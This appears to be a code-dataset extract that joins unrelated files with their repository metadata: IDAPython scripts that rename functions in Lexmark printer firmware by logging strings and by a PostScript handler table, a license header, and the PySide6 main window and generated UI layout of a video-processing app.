# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. # NOTE: use this to enable heic file support # from pillow_heif import register_heif_opener # register_heif_opener()
836
Python
.py
18
45.5
75
0.746032
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,439
rename_lexmark_functions.py
boredpentester_pwn2own_lexmark/rename_lexmark_functions.py
# dirty script to rename Lexmark subroutines based on logging strings from idc import * from ida_xref import * import idautils # You must have identified the printf function. def printf_follow(addr): instcount = 0 xref_addr = addr func = idaapi.get_func(addr) addr = func.startEA print("--- Checking xref 0x%08x" % xref_addr) # Special edge case handler for Lexmark Hydra # The disassembly loads strings then adjusts the offset. # This means strings in the disassembler don't match # those in the decompiler (they are incorrect). # # For example... # The code contains combinations of: # 000462E8: LDR R3, =(aWaitForConfigK - 0x462FC) @ "wait_for_config_key" # ... # 00046304: ADD R3, R3, #0x14 # The actual function name is 'load_plugin', not 'wait_for_config_key' # Calculated as &aWaitForConfigK + 0x14 # # The below code looks for these patterns and resolves # the strings to the correct, expected values # then renames the reviewed function accordingly. # Hacky because we rename in this handler if(GetMnem(xref_addr) == "LDR" and "- 0x" in GetOpnd(xref_addr, 1)): print("--- Possible false positive @ 0x%08x. Checking." % xref_addr) # move forward n instructions str_addr = xref_addr for x in range(0, 10): str_addr = NextHead(str_addr) # is this instruction an "add rX, rX, offset"? # where rX is the rX from the 'LDR rX' of our xref? if(GetMnem(str_addr) == "ADD" and GetOpnd(xref_addr, 0) == GetOpnd(str_addr, 0) and GetOpnd(str_addr, 0) == GetOpnd(str_addr, 1)): #print("--- Found candidate str load @ 0x%08X" % str_addr) # get address of loaded string # LDR R2, =(aNpapiRead - 0x3FB994) @ "npapi_read" # =(aNpapiRead - 0x3FB994) - we want just "aNpapiRead" func_str = GetOpnd(xref_addr, 1)[2:] func_str = func_str.split(" ", 1)[0] # func_str = aNpapiRead # now add value to it so we get the correct string guessed_func_name = get_name_ea_simple(func_str)+GetOperandValue(str_addr, 2) print("--- [*] Renaming %s (%x) to %s" % (GetFunctionName(func.startEA), func.startEA, get_strlit_contents(guessed_func_name, -1))) idaapi.set_name(func.startEA, str(get_strlit_contents(guessed_func_name, -1)), idaapi.SN_NOWARN | idaapi.SN_NOCHECK | idaapi.SN_FORCE) break return 0 elif(GetMnem(xref_addr) == "ADD" or GetMnem(xref_addr) == "SUB"): print("--- Definite false positive @ 0x%08x. Skipping." % xref_addr) return 0 # cycle through function instructions # that contain a string of interest # and look for printf or equivilant calls using the string, # if we see function name, then we rename the function accordingly #addr = xref_addr # we start from the xref # ^ for Hydra, we started from the beginning of the function # but starting from the xref address seems to be yield less # false positives while addr < func.endEA and instcount < 15: mnem = GetMnem(addr) oper = GetOpnd(addr, 0) if(oper == ""): addr = NextHead(addr) instcount += 1 continue # for debugging #print("%s %s" % (mnem, oper)) # debug with sub_3AF6CC # jal == mips call, change to b/bl for ARM # check for various calls via oper if(mnem == "BL" and oper == "malloc_wrapper" or oper == "Malloc_snprintf_lock" or oper == "Malloc_snprintf_unlock" or oper == "_syslog_chk" or oper == "__syslog_chk" or oper == "l_error" or oper == "_assert_fail" or oper == "__printf_chk" or oper == "__assert_fail" or oper == "puts" or oper == "l_warn_failed_assertion" or oper == "hydra_add_shutdown_hook" or oper == "rob_proxy_add_observer" or oper == "_printf_chk" or oper == "printf" or oper == "_fprintf_chk"): # we found a function of interest, now make sure this string is close to the function call return 1 addr = NextHead(addr) instcount += 1 return 0 sc = idautils.Strings() flag = 0 seen_funcs = [] for s in sc: st = str(s) # if this string matches the below pattern, it's probably a function name, let's check if its used in a call to # printf/print_module_log_print if(len(st) > 5 and ':' not in st and '=' not in st and '!' not in st and '&' not in st and '[' not in st and '!' not in st and '%' not in st and '.' not in st and ' ' not in st and '.h' not in st and '.c' not in st and '(' not in st and '>' not in st and '/' not in st and '\n' not in st and st.isupper() == False): xrefs = [x for x in XrefsTo(s.ea, flags=0)] if(len(xrefs) > 0): for x in xrefs: fname = GetFunctionName(x.frm) if(fname == ""): continue; # note we do not rename functions that already have names! if(fname not in seen_funcs and fname.startswith("sub_")): print("Checking func %s" % fname) if(printf_follow(x.frm)): addr = idaapi.get_func(x.frm).startEA #int(fname.split('sub_')[1], 16) print("--- [+] Renaming %s (%x) to %s" % (fname, addr, st)) ## don't rename as we're debugging idaapi.set_name(addr, st, idaapi.SN_NOWARN | idaapi.SN_NOCHECK | idaapi.SN_FORCE) # if we've renamed, track it, so we don't rename it again when we see a later xref! seen_funcs.append(fname) # for now seen_funcs.append(st) print("[+] Done")
5,835
Python
.py
104
45.865385
474
0.598027
boredpentester/pwn2own_lexmark
8
0
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,440
rename_lexmark_pagemaker_sym_table.py
boredpentester_pwn2own_lexmark/rename_lexmark_pagemaker_sym_table.py
''' Lexmark's Pagemaker has what appears to be a symbol table for Postscript (and other) handlers. .rodata:00378A1C sym_table postscript_handler <aAbs, sub_103A10, 0, 0> .rodata:00378A1C ; DATA XREF: sub_6690C+48↑o .rodata:00378A1C ; sub_66BA4+8↑o ... .rodata:00378A1C postscript_handler <aAdd_0, sub_1033A8, 0, 1> ; "PPDS" ... .rodata:00378A1C postscript_handler <aAload, sub_105048, 0, 2> .rodata:00378A1C postscript_handler <aAnchorsearch, sub_AA508, 0, 3> .rodata:00378A1C postscript_handler <aPInfoDevinfoFl+0x20, sub_7FAE8, 0, 4> .rodata:00378A1C postscript_handler <aBgcArc+4, sub_D6550, 0, 5> .rodata:00378A1C postscript_handler <aArcn, sub_D696C, 0, 6> .rodata:00378A1C postscript_handler <aArct, sub_D9B20, 0, 7> .rodata:00378A1C postscript_handler <aArcto, sub_D9B18, 0, 8> .rodata:00378A1C postscript_handler <aArray, sub_1044AC, 0, 9> .rodata:00378A1C postscript_handler <aAshow, sub_13E5B8, 0, 0xA> .rodata:00378A1C postscript_handler <aAstore, sub_1051E0, 0, 0xB> .rodata:00378A1C postscript_handler <aAwidthshow, sub_13EB20, 0, 0xC> .rodata:00378A1C postscript_handler <aMarkFontsetini+0x28, sub_A7E18, 0, 0xD> .rodata:00378A1C postscript_handler <aBind, sub_80E20, 0, 0xE> .rodata:00378A1C postscript_handler <aBitshift, sub_7FD3C, 0, 0xF> .rodata:00378A1C postscript_handler <aCeiling, sub_103B08, 0, 0x10> .rodata:00378A1C postscript_handler <aCharpath, sub_13F7C0, 0, 0x11> .rodata:00378A1C postscript_handler <aClear_0, sub_1031C8, 0, 0x12> .rodata:00378A1C postscript_handler <aMarkExchSetcol+0x18, sub_1032B8, 0, 0x13> .rodata:00378A1C postscript_handler <aRectclip+4, sub_D81A8, 0, 0x14> .rodata:00378A1C postscript_handler <aViewclippath+4, sub_D7554, 0, 0x15> .rodata:00378A1C postscript_handler <aClosepath_0, sub_D728C, 0, 0x16> There are over 1000 of these structure definitions. This script auto-renames (and defines) the functions. ''' from idautils import * from idc import * from idaapi import * struct_size = 0x10 struct_objs = 1302 start = get_name_ea_simple("sym_table") # must be defined! Lives at 0x00378A1C in Pagemaker end = start+(struct_size*struct_objs) print("Iterating from 0x%08x to 0x%08x" % (start, end)) while start < end: proposed_func_name = idc.Dword(start) func_addr = idc.Dword(start+4) fname = GetFunctionName(func_addr) if(func_addr == idc.BADADDR or fname == ""): print("Skipping @ 0x%08X" % start) start += struct_size continue; proposed_name = str(get_strlit_contents(proposed_func_name, -1, ida_nalt.STRTYPE_C)) print("Offset: %08x" % start) print("Current name: %s" % fname) print("Proposed name: %s" % proposed_name) print("Address: 0x%08x" % func_addr) print("") MakeFunction(func_addr) idaapi.set_name(func_addr, proposed_name, idaapi.SN_NOWARN | idaapi.SN_NOCHECK | idaapi.SN_FORCE) start += struct_size print("Done!")
3,380
Python
.py
55
57.581818
106
0.632073
boredpentester/pwn2own_lexmark
8
0
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,441
main.py
wish2333_VideoExtractAndConcat/main.py
import sys # import logging import os # 第三方库 from PySide6.QtCore import Qt from PySide6.QtGui import QIcon from PySide6.QtWidgets import QApplication, QWidget from qfluentwidgets import FluentWindow, FluentIcon, NavigationItemPosition # 自定义模块 from modules.logger_config import logger from modules.setting_Interface import SettingInterface from modules.vcodecp_Interface import VcodecpInterface from modules.vcodec_Interface import VcodecInterface from modules.remuxInterface import RemuxInterface from modules.VfilterInterface import VfilterInterface from modules.VautocutInterface import VautocutInterface from modules.about_Interface import AboutInterface from modules.config import init_ffpath, init_autopath # # 初始化logger # logger = logging.getLogger(__name__) # logger.setLevel(logging.DEBUG) # # 创建一个文件处理器并设置级别、文件名和编码 # if os.path.exists(r'log') == False: # os.mkdir(r'log') # file_handler = logging.handlers.RotatingFileHandler(r'log/log.txt', mode='a', encoding='utf-8', maxBytes=1024 * 1024 * 5, backupCount=5) # file_handler.setLevel(logging.DEBUG) # file_handler.setFormatter(logging.Formatter('%(asctime)s-%(name)s-%(levelname)s - %(message)s')) # # 创建一个控制台处理器并设置级别 # console_handler = logging.StreamHandler() # console_handler.setLevel(logging.INFO) # console_handler.setFormatter(logging.Formatter('%(levelname)s - %(message)s')) # # 将处理器添加到日志记录器 # logger.addHandler(file_handler) # logger.addHandler(console_handler) # 记录日志 logger.info("logger initialized") logger.debug("This should be written to log.txt only") class mainWindow(FluentWindow): def __init__(self): super().__init__() self.init_windows() self.init_widget() self.init_navigation() self.init_config() def init_windows(self): self.resize(1280, 720) # 设置窗口大小 self.navigationInterface.setExpandWidth(250) # 设置导航栏宽度 self.setWindowTitle("VideoExtractAndConcat") # 设置窗口标题 def init_widget(self): self.siglevideoInterface = VcodecInterface(self) self.videoInterface = VcodecpInterface(self) self.remuxInterface = RemuxInterface(self) self.VfilterInterface = VfilterInterface(self) self.VautocutInterface = VautocutInterface(self) self.SettingInterface = SettingInterface(self) self.AboutInterface = AboutInterface(self) def init_navigation(self): self.addSubInterface(self.videoInterface, FluentIcon.HOME, " Home") self.addSubInterface(self.siglevideoInterface, FluentIcon.VIDEO, " Single Video") self.addSubInterface(self.remuxInterface, FluentIcon.FILTER, " Remux") self.addSubInterface(self.VfilterInterface, FluentIcon.TRANSPARENT, " Video Filter") self.navigationInterface.addSeparator() self.addSubInterface(self.VautocutInterface, FluentIcon.CODE, " Autocut") self.addSubInterface(self.AboutInterface, FluentIcon.INFO, " About", NavigationItemPosition.BOTTOM) self.addSubInterface(self.SettingInterface, FluentIcon.SETTING, " Setting", NavigationItemPosition.BOTTOM) def init_config(self): init_ffpath() init_autopath() self.SettingInterface.init_action() if __name__ == '__main__': # enable dpi scale # QApplication.setHighDpiScaleFactorRoundingPolicy(Qt.HighDpiScaleFactorRoundingPolicy.PassThrough) app = QApplication(sys.argv) window = mainWindow() window.show() app.exec()
3,632
Python
.py
76
40.894737
138
0.754762
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,442
Ui_vcodecInterfacee.py
wish2333_VideoExtractAndConcat/modules/Ui_vcodecInterfacee.py
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'vencoInterface.ui' ## ## Created by: Qt User Interface Compiler version 6.7.0 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale, QMetaObject, QObject, QPoint, QRect, QSize, QTime, QUrl, Qt) from PySide6.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont, QFontDatabase, QGradient, QIcon, QImage, QKeySequence, QLinearGradient, QPainter, QPalette, QPixmap, QRadialGradient, QTransform) from PySide6.QtWidgets import (QApplication, QFrame, QGridLayout, QHBoxLayout, QLabel, QLayout, QPlainTextEdit, QPushButton, QSizePolicy, QSpacerItem, QVBoxLayout, QWidget) from qfluentwidgets import (CheckBox, ComboBox, LineEdit, PlainTextEdit, PrimaryPushButton, SpinBox, TimeEdit) class Ui_VcodecInterfacee(object): def setupUi(self, Form): if not Form.objectName(): Form.setObjectName(u"Form") Form.resize(960, 640) Form.setMinimumSize(QSize(960, 640)) Form.setMaximumSize(QSize(1920, 1080)) self.verticalLayout_5 = QVBoxLayout(Form) self.verticalLayout_5.setObjectName(u"verticalLayout_5") self.horizontalLayout_3 = QHBoxLayout() self.horizontalLayout_3.setSpacing(20) self.horizontalLayout_3.setObjectName(u"horizontalLayout_3") self.horizontalLayout_3.setSizeConstraint(QLayout.SizeConstraint.SetDefaultConstraint) self.verticalLayout_4 = QVBoxLayout() self.verticalLayout_4.setObjectName(u"verticalLayout_4") self.verticalLayout_4.setContentsMargins(-1, -1, 0, -1) self.Title1 = QLabel(Form) self.Title1.setObjectName(u"Title1") sizePolicy = QSizePolicy(QSizePolicy.Policy.Maximum, QSizePolicy.Policy.Maximum) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.Title1.sizePolicy().hasHeightForWidth()) self.Title1.setSizePolicy(sizePolicy) self.Title1.setMaximumSize(QSize(100, 64)) font = QFont() font.setFamilies([u"Microsoft YaHei UI"]) font.setPointSize(28) font.setBold(True) font.setKerning(True) self.Title1.setFont(font) self.verticalLayout_4.addWidget(self.Title1) self.Title2 = QLabel(Form) self.Title2.setObjectName(u"Title2") sizePolicy1 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Maximum) sizePolicy1.setHorizontalStretch(0) sizePolicy1.setVerticalStretch(0) sizePolicy1.setHeightForWidth(self.Title2.sizePolicy().hasHeightForWidth()) self.Title2.setSizePolicy(sizePolicy1) self.Title2.setMaximumSize(QSize(100, 45)) font1 = QFont() font1.setFamilies([u"Microsoft YaHei UI"]) font1.setPointSize(18) font1.setBold(True) font1.setKerning(True) self.Title2.setFont(font1) self.verticalLayout_4.addWidget(self.Title2) self.horizontalLayout_3.addLayout(self.verticalLayout_4) self.horizontalSpacer = QSpacerItem(20, 20, QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Minimum) self.horizontalLayout_3.addItem(self.horizontalSpacer) self.console = PlainTextEdit(Form) self.console.setObjectName(u"console") sizePolicy.setHeightForWidth(self.console.sizePolicy().hasHeightForWidth()) self.console.setSizePolicy(sizePolicy) self.console.setMinimumSize(QSize(640, 0)) self.console.setMaximumSize(QSize(640, 96)) self.console.setUndoRedoEnabled(False) self.console.setLineWrapMode(QPlainTextEdit.LineWrapMode.WidgetWidth) self.console.setReadOnly(True) self.horizontalLayout_3.addWidget(self.console) self.verticalLayout_5.addLayout(self.horizontalLayout_3) self.frame = QFrame(Form) self.frame.setObjectName(u"frame") self.frame.setEnabled(True) sizePolicy1.setHeightForWidth(self.frame.sizePolicy().hasHeightForWidth()) self.frame.setSizePolicy(sizePolicy1) self.frame.setMinimumSize(QSize(480, 0)) self.frame.setMaximumSize(QSize(16777215, 160)) self.frame.setFrameShape(QFrame.Shape.StyledPanel) self.frame.setFrameShadow(QFrame.Shadow.Raised) self.verticalLayout = QVBoxLayout(self.frame) self.verticalLayout.setObjectName(u"verticalLayout") self.horizontalLayout = QHBoxLayout() self.horizontalLayout.setObjectName(u"horizontalLayout") self.Title3_1 = QLabel(self.frame) self.Title3_1.setObjectName(u"Title3_1") font2 = QFont() font2.setFamilies([u"Microsoft YaHei UI"]) font2.setPointSize(12) font2.setBold(True) font2.setKerning(True) self.Title3_1.setFont(font2) self.horizontalLayout.addWidget(self.Title3_1) self.lineEdit1 = LineEdit(self.frame) self.lineEdit1.setObjectName(u"lineEdit1") self.lineEdit1.setMinimumSize(QSize(0, 25)) font3 = QFont() font3.setPointSize(10) font3.setKerning(True) self.lineEdit1.setFont(font3) self.horizontalLayout.addWidget(self.lineEdit1) self.fileBtn_1 = QPushButton(self.frame) self.fileBtn_1.setObjectName(u"fileBtn_1") font4 = QFont() font4.setFamilies([u"Microsoft YaHei UI"]) font4.setPointSize(13) font4.setBold(True) font4.setKerning(True) self.fileBtn_1.setFont(font4) self.horizontalLayout.addWidget(self.fileBtn_1) self.verticalLayout.addLayout(self.horizontalLayout) self.horizontalLayout_2 = QHBoxLayout() self.horizontalLayout_2.setObjectName(u"horizontalLayout_2") self.Title3_4 = QLabel(self.frame) self.Title3_4.setObjectName(u"Title3_4") self.Title3_4.setFont(font2) self.horizontalLayout_2.addWidget(self.Title3_4) self.lineEdit2 = LineEdit(self.frame) self.lineEdit2.setObjectName(u"lineEdit2") self.lineEdit2.setMinimumSize(QSize(0, 25)) self.lineEdit2.setFont(font3) self.horizontalLayout_2.addWidget(self.lineEdit2) self.fileBtn_2 = QPushButton(self.frame) self.fileBtn_2.setObjectName(u"fileBtn_2") self.fileBtn_2.setFont(font4) self.horizontalLayout_2.addWidget(self.fileBtn_2) self.verticalLayout.addLayout(self.horizontalLayout_2) self.horizontalLayout_4 = QHBoxLayout() self.horizontalLayout_4.setObjectName(u"horizontalLayout_4") self.horizontalLayout_6 = QHBoxLayout() self.horizontalLayout_6.setObjectName(u"horizontalLayout_6") self.Title3_8 = QLabel(self.frame) self.Title3_8.setObjectName(u"Title3_8") self.Title3_8.setFont(font2) self.horizontalLayout_6.addWidget(self.Title3_8) self.lineEdit4 = LineEdit(self.frame) self.lineEdit4.setObjectName(u"lineEdit4") self.lineEdit4.setMinimumSize(QSize(0, 25)) self.lineEdit4.setFont(font3) self.horizontalLayout_6.addWidget(self.lineEdit4) self.fileBtn_4 = QPushButton(self.frame) self.fileBtn_4.setObjectName(u"fileBtn_4") self.fileBtn_4.setFont(font4) self.horizontalLayout_6.addWidget(self.fileBtn_4) self.horizontalLayout_4.addLayout(self.horizontalLayout_6) self.horizontalLayout_5 = QHBoxLayout() self.horizontalLayout_5.setObjectName(u"horizontalLayout_5") self.Title3_7 = QLabel(self.frame) self.Title3_7.setObjectName(u"Title3_7") self.Title3_7.setFont(font2) self.horizontalLayout_5.addWidget(self.Title3_7) self.lineEdit3 = LineEdit(self.frame) self.lineEdit3.setObjectName(u"lineEdit3") self.lineEdit3.setMinimumSize(QSize(0, 25)) self.lineEdit3.setFont(font3) self.horizontalLayout_5.addWidget(self.lineEdit3) self.fileBtn_3 = QPushButton(self.frame) self.fileBtn_3.setObjectName(u"fileBtn_3") self.fileBtn_3.setFont(font4) self.horizontalLayout_5.addWidget(self.fileBtn_3) self.horizontalLayout_4.addLayout(self.horizontalLayout_5) self.verticalLayout.addLayout(self.horizontalLayout_4) self.verticalLayout_5.addWidget(self.frame) self.horizontalLayout_8 = QHBoxLayout() self.horizontalLayout_8.setObjectName(u"horizontalLayout_8") self.Title2_2 = QLabel(Form) self.Title2_2.setObjectName(u"Title2_2") self.Title2_2.setMaximumSize(QSize(16777215, 45)) self.Title2_2.setFont(font1) self.horizontalLayout_8.addWidget(self.Title2_2) self.Title2_3 = QLabel(Form) self.Title2_3.setObjectName(u"Title2_3") sizePolicy1.setHeightForWidth(self.Title2_3.sizePolicy().hasHeightForWidth()) self.Title2_3.setSizePolicy(sizePolicy1) self.Title2_3.setMinimumSize(QSize(240, 0)) self.Title2_3.setMaximumSize(QSize(220, 16777215)) self.Title2_3.setFont(font1) self.horizontalLayout_8.addWidget(self.Title2_3) self.verticalLayout_5.addLayout(self.horizontalLayout_8) self.horizontalLayout_9 = QHBoxLayout() self.horizontalLayout_9.setSpacing(6) self.horizontalLayout_9.setObjectName(u"horizontalLayout_9") self.frame_2 = QFrame(Form) self.frame_2.setObjectName(u"frame_2") self.frame_2.setMinimumSize(QSize(670, 200)) self.frame_2.setMaximumSize(QSize(16777215, 360)) self.frame_2.setFrameShape(QFrame.Shape.StyledPanel) self.frame_2.setFrameShadow(QFrame.Shadow.Raised) self.verticalLayout_2 = QVBoxLayout(self.frame_2) self.verticalLayout_2.setSpacing(12) self.verticalLayout_2.setObjectName(u"verticalLayout_2") self.verticalLayout_2.setContentsMargins(15, 15, 15, 15) self.gridLayout = QGridLayout() self.gridLayout.setObjectName(u"gridLayout") self.gridLayout.setHorizontalSpacing(24) self.gridLayout.setVerticalSpacing(16) self.comboBox_5 = ComboBox(self.frame_2) self.comboBox_5.addItem("") self.comboBox_5.setObjectName(u"comboBox_5") sizePolicy1.setHeightForWidth(self.comboBox_5.sizePolicy().hasHeightForWidth()) self.comboBox_5.setSizePolicy(sizePolicy1) self.comboBox_5.setMinimumSize(QSize(0, 30)) self.gridLayout.addWidget(self.comboBox_5, 4, 1, 1, 3) self.label_3 = QLabel(self.frame_2) self.label_3.setObjectName(u"label_3") self.label_3.setFont(font2) self.gridLayout.addWidget(self.label_3, 3, 0, 1, 1) self.label_5 = QLabel(self.frame_2) self.label_5.setObjectName(u"label_5") font5 = QFont() font5.setFamilies([u"Microsoft YaHei UI"]) font5.setPointSize(16) font5.setBold(True) font5.setKerning(True) self.label_5.setFont(font5) self.gridLayout.addWidget(self.label_5, 5, 0, 1, 1) self.checkBox_2 = CheckBox(self.frame_2) self.checkBox_2.setObjectName(u"checkBox_2") self.checkBox_2.setFont(font3) self.gridLayout.addWidget(self.checkBox_2, 1, 0, 1, 1) self.label_6 = QLabel(self.frame_2) self.label_6.setObjectName(u"label_6") self.label_6.setFont(font2) self.gridLayout.addWidget(self.label_6, 2, 0, 1, 1) self.comboBox_2 = ComboBox(self.frame_2) self.comboBox_2.addItem("") self.comboBox_2.addItem("") self.comboBox_2.addItem("") self.comboBox_2.addItem("") self.comboBox_2.addItem("") self.comboBox_2.setObjectName(u"comboBox_2") sizePolicy2 = QSizePolicy(QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Minimum) sizePolicy2.setHorizontalStretch(0) sizePolicy2.setVerticalStretch(0) sizePolicy2.setHeightForWidth(self.comboBox_2.sizePolicy().hasHeightForWidth()) self.comboBox_2.setSizePolicy(sizePolicy2) self.comboBox_2.setMinimumSize(QSize(0, 30)) font6 = QFont() font6.setPointSize(12) font6.setKerning(True) self.comboBox_2.setFont(font6) self.gridLayout.addWidget(self.comboBox_2, 0, 3, 1, 1) self.comboBox_3 = ComboBox(self.frame_2) self.comboBox_3.addItem("") self.comboBox_3.addItem("") self.comboBox_3.addItem("") self.comboBox_3.addItem("") self.comboBox_3.addItem("") self.comboBox_3.setObjectName(u"comboBox_3") sizePolicy3 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Minimum) sizePolicy3.setHorizontalStretch(0) sizePolicy3.setVerticalStretch(0) sizePolicy3.setHeightForWidth(self.comboBox_3.sizePolicy().hasHeightForWidth()) self.comboBox_3.setSizePolicy(sizePolicy3) self.comboBox_3.setMinimumSize(QSize(0, 30)) self.comboBox_3.setFont(font6) self.gridLayout.addWidget(self.comboBox_3, 3, 3, 1, 1) self.Title3_2 = QLabel(self.frame_2) self.Title3_2.setObjectName(u"Title3_2") self.Title3_2.setFont(font2) self.gridLayout.addWidget(self.Title3_2, 0, 0, 1, 1) self.label_7 = QLabel(self.frame_2) self.label_7.setObjectName(u"label_7") self.label_7.setFont(font2) self.gridLayout.addWidget(self.label_7, 2, 2, 1, 1) self.lineEdit = LineEdit(self.frame_2) self.lineEdit.setObjectName(u"lineEdit") sizePolicy4 = QSizePolicy(QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Fixed) sizePolicy4.setHorizontalStretch(0) sizePolicy4.setVerticalStretch(0) sizePolicy4.setHeightForWidth(self.lineEdit.sizePolicy().hasHeightForWidth()) self.lineEdit.setSizePolicy(sizePolicy4) self.lineEdit.setFont(font3) self.gridLayout.addWidget(self.lineEdit, 1, 1, 1, 1) self.spinBox = SpinBox(self.frame_2) self.spinBox.setObjectName(u"spinBox") sizePolicy2.setHeightForWidth(self.spinBox.sizePolicy().hasHeightForWidth()) self.spinBox.setSizePolicy(sizePolicy2) self.spinBox.setMinimumSize(QSize(0, 30)) self.spinBox.setFont(font6) self.spinBox.setMaximum(40000) self.spinBox.setValue(800) self.gridLayout.addWidget(self.spinBox, 2, 1, 1, 1) self.lineEdit_2 = LineEdit(self.frame_2) self.lineEdit_2.setObjectName(u"lineEdit_2") sizePolicy4.setHeightForWidth(self.lineEdit_2.sizePolicy().hasHeightForWidth()) self.lineEdit_2.setSizePolicy(sizePolicy4) self.lineEdit_2.setFont(font3) self.gridLayout.addWidget(self.lineEdit_2, 1, 3, 1, 1) self.label = QLabel(self.frame_2) self.label.setObjectName(u"label") self.label.setFont(font2) self.gridLayout.addWidget(self.label, 0, 2, 1, 1) self.checkBox_3 = CheckBox(self.frame_2) self.checkBox_3.setObjectName(u"checkBox_3") self.checkBox_3.setFont(font3) self.gridLayout.addWidget(self.checkBox_3, 1, 2, 1, 1) self.comboBox_4 = ComboBox(self.frame_2) self.comboBox_4.addItem("") self.comboBox_4.addItem("") self.comboBox_4.addItem("") self.comboBox_4.addItem("") self.comboBox_4.addItem("") self.comboBox_4.addItem("") self.comboBox_4.setObjectName(u"comboBox_4") sizePolicy3.setHeightForWidth(self.comboBox_4.sizePolicy().hasHeightForWidth()) self.comboBox_4.setSizePolicy(sizePolicy3) self.comboBox_4.setMinimumSize(QSize(0, 30)) self.comboBox_4.setFont(font6) self.gridLayout.addWidget(self.comboBox_4, 3, 1, 1, 1) self.comboBox = ComboBox(self.frame_2) self.comboBox.addItem("") self.comboBox.addItem("") self.comboBox.addItem("") self.comboBox.addItem("") self.comboBox.addItem("") self.comboBox.addItem("") self.comboBox.setObjectName(u"comboBox") sizePolicy2.setHeightForWidth(self.comboBox.sizePolicy().hasHeightForWidth()) self.comboBox.setSizePolicy(sizePolicy2) self.comboBox.setMinimumSize(QSize(0, 30)) font7 = QFont() font7.setFamilies([u"Microsoft YaHei UI"]) font7.setPointSize(12) font7.setKerning(True) self.comboBox.setFont(font7) self.gridLayout.addWidget(self.comboBox, 0, 1, 1, 1) self.spinBox_2 = SpinBox(self.frame_2) self.spinBox_2.setObjectName(u"spinBox_2") sizePolicy2.setHeightForWidth(self.spinBox_2.sizePolicy().hasHeightForWidth()) self.spinBox_2.setSizePolicy(sizePolicy2) self.spinBox_2.setFont(font6) self.spinBox_2.setMaximum(51) self.spinBox_2.setValue(23) self.gridLayout.addWidget(self.spinBox_2, 2, 3, 1, 1) self.label_4 = QLabel(self.frame_2) self.label_4.setObjectName(u"label_4") self.label_4.setFont(font2) self.gridLayout.addWidget(self.label_4, 3, 2, 1, 1) self.checkBox = CheckBox(self.frame_2) self.checkBox.setObjectName(u"checkBox") self.checkBox.setSizeIncrement(QSize(0, 0)) font8 = QFont() font8.setFamilies([u"Microsoft YaHei UI"]) font8.setPointSize(12) font8.setBold(True) font8.setKerning(True) font8.setHintingPreference(QFont.PreferDefaultHinting) self.checkBox.setFont(font8) self.checkBox.setMouseTracking(True) self.checkBox.setLayoutDirection(Qt.LayoutDirection.LeftToRight) self.checkBox.setInputMethodHints(Qt.InputMethodHint.ImhNone) self.checkBox.setAutoExclusive(False) self.gridLayout.addWidget(self.checkBox, 4, 0, 1, 1) self.plainTextEdit = PlainTextEdit(self.frame_2) self.plainTextEdit.setObjectName(u"plainTextEdit") font9 = QFont() font9.setPointSize(12) self.plainTextEdit.setFont(font9) self.gridLayout.addWidget(self.plainTextEdit, 5, 1, 1, 3) self.verticalLayout_2.addLayout(self.gridLayout) self.horizontalLayout_9.addWidget(self.frame_2) self.frame_3 = QFrame(Form) self.frame_3.setObjectName(u"frame_3") sizePolicy2.setHeightForWidth(self.frame_3.sizePolicy().hasHeightForWidth()) self.frame_3.setSizePolicy(sizePolicy2) self.frame_3.setMinimumSize(QSize(240, 200)) self.frame_3.setMaximumSize(QSize(240, 360)) self.frame_3.setFrameShape(QFrame.Shape.StyledPanel) self.frame_3.setFrameShadow(QFrame.Shadow.Raised) self.verticalLayout_3 = QVBoxLayout(self.frame_3) self.verticalLayout_3.setObjectName(u"verticalLayout_3") self.verticalLayout_3.setContentsMargins(15, -1, 15, -1) self.Title3_3 = QLabel(self.frame_3) self.Title3_3.setObjectName(u"Title3_3") self.Title3_3.setFont(font5) self.verticalLayout_3.addWidget(self.Title3_3) self.timeEdit = TimeEdit(self.frame_3) self.timeEdit.setObjectName(u"timeEdit") sizePolicy4.setHeightForWidth(self.timeEdit.sizePolicy().hasHeightForWidth()) self.timeEdit.setSizePolicy(sizePolicy4) self.timeEdit.setMinimumSize(QSize(150, 30)) self.timeEdit.setFont(font6) self.verticalLayout_3.addWidget(self.timeEdit) self.label_2 = QLabel(self.frame_3) self.label_2.setObjectName(u"label_2") self.label_2.setFont(font5) self.verticalLayout_3.addWidget(self.label_2) self.timeEdit_2 = TimeEdit(self.frame_3) self.timeEdit_2.setObjectName(u"timeEdit_2") self.timeEdit_2.setMinimumSize(QSize(150, 30)) self.timeEdit_2.setFont(font6) self.verticalLayout_3.addWidget(self.timeEdit_2) self.verticalSpacer = QSpacerItem(20, 30, QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Maximum) self.verticalLayout_3.addItem(self.verticalSpacer) self.pushBtn = PrimaryPushButton(self.frame_3) self.pushBtn.setObjectName(u"pushBtn") sizePolicy5 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Fixed) sizePolicy5.setHorizontalStretch(0) sizePolicy5.setVerticalStretch(0) sizePolicy5.setHeightForWidth(self.pushBtn.sizePolicy().hasHeightForWidth()) self.pushBtn.setSizePolicy(sizePolicy5) self.pushBtn.setFont(font5) 